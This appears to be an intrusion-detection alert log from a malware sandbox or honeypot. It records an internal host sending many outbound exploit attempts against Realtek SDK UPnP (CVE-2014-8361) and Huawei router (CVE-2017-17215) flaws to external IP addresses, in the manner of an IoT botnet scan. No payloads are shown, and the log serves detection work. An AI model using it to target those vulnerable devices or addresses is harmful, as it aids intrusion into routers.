                                      07/20/24-23:01:26.790100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3576852869192.168.2.23168.91.139.254
                                      07/20/24-23:01:41.298259TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615939252869192.168.2.2349.57.98.237
                                      07/20/24-23:01:53.735607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615064052869192.168.2.23107.61.249.135
                                      07/20/24-23:01:43.096223TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615673452869192.168.2.23170.47.68.177
                                      07/20/24-23:01:52.116386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778852869192.168.2.23126.2.96.116
                                      07/20/24-23:01:44.745095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613658052869192.168.2.23140.201.238.135
                                      07/20/24-23:01:20.157619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5588237215192.168.2.23157.133.195.170
                                      07/20/24-23:01:59.104072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4500252869192.168.2.2323.185.211.99
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391837215192.168.2.23157.249.229.44
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379637215192.168.2.23157.139.28.102
                                      07/20/24-23:01:07.036064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380837215192.168.2.2376.182.125.5
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464437215192.168.2.23197.141.230.31
                                      07/20/24-23:01:08.903232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25170452869192.168.2.23131.199.217.59
                                      07/20/24-23:01:42.250039TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23815252869192.168.2.23136.37.204.244
                                      07/20/24-23:01:31.974837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580837215192.168.2.23169.97.93.18
                                      07/20/24-23:01:44.527952TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24694052869192.168.2.23163.49.61.251
                                      07/20/24-23:01:45.037292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615782652869192.168.2.2383.201.129.18
                                      07/20/24-23:01:48.138392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25815452869192.168.2.231.111.156.136
                                      07/20/24-23:01:49.578308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4279052869192.168.2.2337.20.218.143
                                      07/20/24-23:01:44.325103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5744652869192.168.2.23195.45.218.64
                                      07/20/24-23:01:45.731228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3548252869192.168.2.23222.131.76.141
                                      07/20/24-23:01:51.288562TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3870252869192.168.2.23209.27.18.74
                                      07/20/24-23:01:08.584507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3596052869192.168.2.238.98.158.174
                                      07/20/24-23:01:43.141970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4544852869192.168.2.2350.218.167.53
                                      07/20/24-23:01:31.321189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569652869192.168.2.23106.220.99.163
                                      07/20/24-23:01:20.202325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903237215192.168.2.23197.211.124.137
                                      07/20/24-23:01:42.758699TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615673452869192.168.2.2396.213.123.243
                                      07/20/24-23:01:50.176893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613635452869192.168.2.23216.183.225.201
                                      07/20/24-23:01:56.327422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5767052869192.168.2.2387.244.170.26
                                      07/20/24-23:01:44.118192TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613312852869192.168.2.2367.14.83.223
                                      07/20/24-23:01:48.021704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3812652869192.168.2.23114.19.125.68
                                      07/20/24-23:01:51.220119TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3508852869192.168.2.2346.50.151.45
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024437215192.168.2.23197.83.239.39
                                      07/20/24-23:01:41.217142TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613286052869192.168.2.2341.87.239.136
                                      07/20/24-23:00:57.222164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447237215192.168.2.2341.90.43.161
                                      07/20/24-23:01:31.312614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5677252869192.168.2.23188.173.105.15
                                      07/20/24-23:01:41.747994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614827052869192.168.2.2371.169.30.84
                                      07/20/24-23:00:59.153608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361037215192.168.2.2341.178.183.186
                                      07/20/24-23:01:34.045143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960437215192.168.2.2341.36.189.61
                                      07/20/24-23:01:31.313383TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23428852869192.168.2.2347.20.172.49
                                      07/20/24-23:01:44.085493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897452869192.168.2.23116.148.59.65
                                      07/20/24-23:01:27.650643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025637215192.168.2.23157.71.17.129
                                      07/20/24-23:01:11.638042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135637215192.168.2.23157.158.215.83
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670037215192.168.2.23197.202.17.201
                                      07/20/24-23:01:46.020177TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5656052869192.168.2.23151.149.108.97
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809437215192.168.2.2341.70.153.225
                                      07/20/24-23:01:45.165718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3623052869192.168.2.2350.208.25.112
                                      07/20/24-23:01:48.958887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3662452869192.168.2.2395.200.159.137
                                      07/20/24-23:01:56.304951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4553052869192.168.2.23104.73.220.78
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893437215192.168.2.23157.121.108.79
                                      07/20/24-23:01:13.345185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4350452869192.168.2.2353.137.194.88
                                      07/20/24-23:01:42.280418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614907052869192.168.2.2318.181.232.193
                                      07/20/24-23:01:42.984532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4435852869192.168.2.2342.66.196.35
                                      07/20/24-23:01:40.323034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702637215192.168.2.23157.183.96.221
                                      07/20/24-23:01:47.966822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4123252869192.168.2.23171.220.105.123
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375437215192.168.2.2341.99.169.51
                                      07/20/24-23:01:42.677301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5598652869192.168.2.2342.61.115.2
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924037215192.168.2.23157.210.250.205
                                      07/20/24-23:01:42.631864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24904452869192.168.2.23132.180.52.133
                                      07/20/24-23:01:49.921076TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23524452869192.168.2.23120.69.243.217
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580437215192.168.2.23197.158.29.84
                                      07/20/24-23:01:08.572556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5412452869192.168.2.23143.254.34.7
                                      07/20/24-23:01:58.755147TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614599452869192.168.2.2392.186.116.223
                                      07/20/24-23:01:08.638879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5180052869192.168.2.2346.176.142.26
                                      07/20/24-23:01:44.888072TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25391852869192.168.2.23105.83.227.139
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150237215192.168.2.23157.109.181.179
                                      07/20/24-23:01:08.554229TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4579852869192.168.2.23189.75.86.189
                                      07/20/24-23:01:13.730392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5254852869192.168.2.23118.135.71.210
                                      07/20/24-23:01:44.489022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3543452869192.168.2.2382.91.121.224
                                      07/20/24-23:01:01.793488TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5768252869192.168.2.2313.112.9.246
                                      07/20/24-23:01:24.813625TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615116052869192.168.2.2390.135.90.32
                                      07/20/24-23:01:59.992285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613724052869192.168.2.2386.115.200.136
                                      07/20/24-23:00:59.175742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961637215192.168.2.23157.134.191.30
                                      07/20/24-23:01:46.225146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23668852869192.168.2.2343.224.149.155
                                      07/20/24-23:01:43.147289TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614778252869192.168.2.23158.240.85.125
                                      07/20/24-23:01:45.072641TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24214052869192.168.2.23107.204.90.199
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478037215192.168.2.23219.159.165.91
                                      07/20/24-23:01:58.892811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3557652869192.168.2.2396.23.98.70
                                      07/20/24-23:01:57.723224TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614518852869192.168.2.2314.138.152.232
                                      07/20/24-23:01:41.956473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3581052869192.168.2.23175.222.36.60
                                      07/20/24-23:01:44.440143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5576452869192.168.2.23124.24.223.164
                                      07/20/24-23:01:08.589760TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5169052869192.168.2.23190.34.49.149
                                      07/20/24-23:01:51.624541TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614820252869192.168.2.23197.243.125.183
                                      07/20/24-23:01:02.750140TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616032652869192.168.2.232.32.130.76
                                      07/20/24-23:01:42.685722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5013652869192.168.2.23143.235.222.68
                                      07/20/24-23:01:21.966302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345437215192.168.2.2341.66.223.29
                                      07/20/24-23:01:44.996260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23987852869192.168.2.23190.104.185.79
                                      07/20/24-23:01:04.782707TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615643652869192.168.2.23139.21.143.158
                                      07/20/24-23:01:08.672944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5055652869192.168.2.2312.208.124.228
                                      07/20/24-23:01:01.521998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4156252869192.168.2.23157.99.82.194
                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711837215192.168.2.2341.96.43.132
                                      07/20/24-23:02:20.068152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613782452869192.168.2.23203.12.208.34
                                      07/20/24-23:01:51.290015TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4515252869192.168.2.23138.90.100.113
                                      07/20/24-23:01:20.119972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455437215192.168.2.2341.175.17.192
                                      07/20/24-23:01:42.111275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4397452869192.168.2.23125.78.0.230
                                      07/20/24-23:01:43.360543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615451852869192.168.2.2399.181.48.189
                                      07/20/24-23:01:42.813695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5403252869192.168.2.23196.168.75.104
                                      07/20/24-23:01:49.555689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613501652869192.168.2.23147.48.69.29
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374237215192.168.2.2341.45.176.207
                                      07/20/24-23:01:53.344252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3750452869192.168.2.2340.95.139.12
                                      07/20/24-23:02:05.374045TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25586852869192.168.2.2395.71.29.54
                                      07/20/24-23:01:11.634372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905637215192.168.2.2341.84.51.227
                                      07/20/24-23:01:41.318733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5529852869192.168.2.23102.22.43.107
                                      07/20/24-23:02:02.751507TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25357652869192.168.2.23167.60.51.106
                                      07/20/24-23:01:42.939519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5047452869192.168.2.2370.191.15.111
                                      07/20/24-23:01:43.951862TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616071452869192.168.2.23115.59.47.171
                                      07/20/24-23:01:47.775082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23810452869192.168.2.2337.115.2.79
                                      07/20/24-23:01:45.723019TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614189052869192.168.2.23201.140.184.210
                                      07/20/24-23:01:40.290003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681237215192.168.2.2341.190.219.204
                                      07/20/24-23:01:58.364551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614844652869192.168.2.23192.226.51.190
                                      07/20/24-23:01:53.057358TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5455252869192.168.2.2363.26.163.169
                                      07/20/24-23:01:42.509004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959452869192.168.2.231.84.241.246
                                      07/20/24-23:01:42.399678TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26076252869192.168.2.2340.23.131.130
                                      07/20/24-23:01:41.682135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286052869192.168.2.238.157.181.46
                                      07/20/24-23:01:31.322288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24199652869192.168.2.23115.28.108.81
                                      07/20/24-23:01:00.638305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.23156.90.210.240
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239837215192.168.2.2372.213.126.209
                                      07/20/24-23:01:27.650870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387037215192.168.2.2341.14.54.254
                                      07/20/24-23:01:59.539512TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613592452869192.168.2.23223.130.78.45
                                      07/20/24-23:01:43.966760TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615633052869192.168.2.23150.220.0.209
                                      07/20/24-23:01:44.814790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616023652869192.168.2.2363.140.14.0
                                      07/20/24-23:01:02.113054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704237215192.168.2.23148.121.203.188
                                      07/20/24-23:01:04.097857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578237215192.168.2.23157.200.219.60
                                      07/20/24-23:01:41.245523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5840852869192.168.2.23207.56.45.233
                                      07/20/24-23:01:26.043735TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614662052869192.168.2.23151.83.163.85
                                      07/20/24-23:01:49.454456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4938652869192.168.2.23203.201.27.61
                                      07/20/24-23:01:07.061779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643237215192.168.2.23157.45.105.246
                                      07/20/24-23:01:42.683079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3869252869192.168.2.2351.209.215.233
                                      07/20/24-23:01:43.852550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24184652869192.168.2.2332.76.174.48
                                      07/20/24-23:01:02.104571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341637215192.168.2.23157.54.52.201
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887037215192.168.2.23197.232.195.38
                                      07/20/24-23:01:20.591324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4390052869192.168.2.2347.250.162.49
                                      07/20/24-23:01:40.307218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844437215192.168.2.23197.63.159.44
                                      07/20/24-23:01:47.796509TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5258652869192.168.2.23210.209.80.73
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667237215192.168.2.2344.137.32.198
                                      07/20/24-23:01:56.579360TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615083852869192.168.2.2363.43.122.73
                                      07/20/24-23:01:13.152454TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615935652869192.168.2.2352.234.117.101
                                      07/20/24-23:02:09.321968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5148252869192.168.2.23213.67.172.218
                                      07/20/24-23:01:56.007136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6099052869192.168.2.23104.171.202.164
                                      07/20/24-23:01:59.234150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3334052869192.168.2.2337.223.190.191
                                      07/20/24-23:01:02.047411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774437215192.168.2.2341.16.105.104
                                      07/20/24-23:01:44.718858TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25809252869192.168.2.2339.124.235.174
                                      07/20/24-23:01:04.115220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198837215192.168.2.2396.4.116.14
                                      07/20/24-23:01:47.614619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23721452869192.168.2.23174.213.208.19
                                      07/20/24-23:02:01.645032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5479852869192.168.2.23222.178.130.155
                                      07/20/24-23:01:20.596401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3924852869192.168.2.23157.5.72.210
                                      07/20/24-23:01:53.261844TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3641252869192.168.2.23203.219.226.207
                                      07/20/24-23:01:32.032492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561237215192.168.2.23155.165.117.153
                                      07/20/24-23:01:12.853279TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5253652869192.168.2.23223.86.47.43
                                      07/20/24-23:01:11.817771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5902037215192.168.2.23197.90.60.195
                                      07/20/24-23:01:45.331813TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4564852869192.168.2.2360.240.72.8
                                      07/20/24-23:01:34.053062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098237215192.168.2.2324.36.209.119
                                      07/20/24-23:01:02.702506TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614953052869192.168.2.23132.86.136.162
                                      07/20/24-23:01:27.654172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720037215192.168.2.23157.251.237.127
                                      07/20/24-23:01:02.359782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615776452869192.168.2.23169.193.81.146
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940837215192.168.2.23157.166.180.100
                                      07/20/24-23:01:49.207937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613781652869192.168.2.23135.128.96.121
                                      07/20/24-23:01:41.193880TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613430852869192.168.2.23216.159.45.191
                                      07/20/24-23:01:07.036064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630237215192.168.2.23157.135.212.156
                                      07/20/24-23:01:08.652877TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24738052869192.168.2.23120.98.109.98
                                      07/20/24-23:01:20.598095TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25241452869192.168.2.23205.132.5.218
                                      07/20/24-23:01:53.281781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3901452869192.168.2.23162.69.127.248
                                      07/20/24-23:01:10.711138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614223252869192.168.2.23181.43.61.4
                                      07/20/24-23:01:43.005974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5629052869192.168.2.23208.24.233.14
                                      07/20/24-23:01:57.101402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953652869192.168.2.239.97.212.169
                                      07/20/24-23:01:27.650870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.23197.157.38.150
                                      07/20/24-23:01:31.317774TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25559252869192.168.2.2335.92.216.124
                                      07/20/24-23:01:41.374418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591652869192.168.2.2393.148.210.215
                                      07/20/24-23:01:14.095462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933837215192.168.2.23197.254.24.88
                                      07/20/24-23:01:46.241196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928252869192.168.2.23220.111.117.206
                                      07/20/24-23:01:08.614193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25903652869192.168.2.23219.105.54.148
                                      07/20/24-23:01:25.503352TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5701652869192.168.2.23213.71.93.224
                                      07/20/24-23:01:00.638418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669837215192.168.2.23157.83.139.204
                                      07/20/24-23:01:08.655109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5477452869192.168.2.23132.33.116.164
                                      07/20/24-23:01:42.693536TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613304252869192.168.2.23107.163.195.19
                                      07/20/24-23:01:08.578116TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24438452869192.168.2.23159.20.45.153
                                      07/20/24-23:01:43.877765TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4609452869192.168.2.23183.90.49.252
